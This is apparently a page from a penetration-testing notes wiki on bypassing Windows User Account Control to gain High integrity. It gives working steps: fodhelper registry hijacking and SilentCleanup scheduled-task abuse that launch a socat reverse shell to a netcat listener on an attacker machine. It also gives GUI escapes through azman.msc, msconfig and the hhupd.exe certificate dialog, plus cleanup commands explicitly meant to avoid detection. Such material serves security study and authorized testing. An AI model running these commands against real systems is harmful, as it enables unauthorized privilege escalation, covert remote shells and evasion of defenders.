UAC Windows Privilege Escalation

UAC (User Account Control) is an access control enforcement feature.

PreviousOutlook Reminder Privilege Escalation NextWindows PrivEsc with Kerberos

Last updated 1 year ago

UAC Windows Privilege Escalation

UAC (User Account Control) is an access control enforcement feature.

is an automation tool for defeating Windows UAC.

# Check the current user's integrity level
whoami /groups | findstr "Label"
whoami /groups | find "Label"
Copied!

Open AZMAN.MSC by entering “azman.msc” in the Run.
Click Help and select Help Topics. The MMC window will open.
In the MMC window, right-click and select View Source. The Notepad opens.
In the Notepad, select File → Open.
In Explorer, select Windows/System32/cmd.exe and right-click, then select Open.
We should escalate to High integrity level.

Fodhelper manages the Windows features settings.

First start listener in local machine for getting incoming connection.

nc -lvnp 4444
Copied!

In remote Windows machien, add subkey to the registry and execute fodhelper to reverse shell.

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\socat.exe TCP:<local-ip>:4444 EXEC:cmd.exe,pipes"
# /v: Value name under the selected key.
# /d: Data to assign to the registry ValueName being added.
# /f: Force overwriting the existing registry entry without prompt.
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe
Copied!

We should get a shell and elevate High integrity level.

To check the IL, run the following command.

whoami /groups | find "Label"
Copied!

Finally, we need to clear the above settings to avoid detection.

# /f: Forces the deletion without prompt
reg delete HKCU\Software\Classes\ms-settings\ /f
Copied!

Start listener for getting reverse connection in local machine.

nc -lvnp 4444
Copied!

Add the entry to registry to reverse shell.


reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\socat.exe TCP:<local-ip>:4444 EXEC:cmd.exe,pipes &REM " /f
# /run: Start the scheduled tasks immediately.
# /tn: Task name
# /I: Idle time
schtasks /run  /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Copied!

Open System Configuration by entering "msconfig" in the Run.
Go to Tools tab and select Command Prompt, then click Launch.
We should escalate to High integrity level.

UAC Windows Certificate Dialog is vulnerable to privilege escalation.

Open hhupd.exe. The User Account Control window opens.
Click the "Show more details" and click also "Show information about the publisher’s certificate".
Now click the "Issued by" link. Web browser will open.
In web browser, select Tools -> File -> Save as....
On the explorer window address path, enter the cmd.exe full path as below:
"c:\Windows\System32\cmd.exe"

Now we escalated the privilege.

References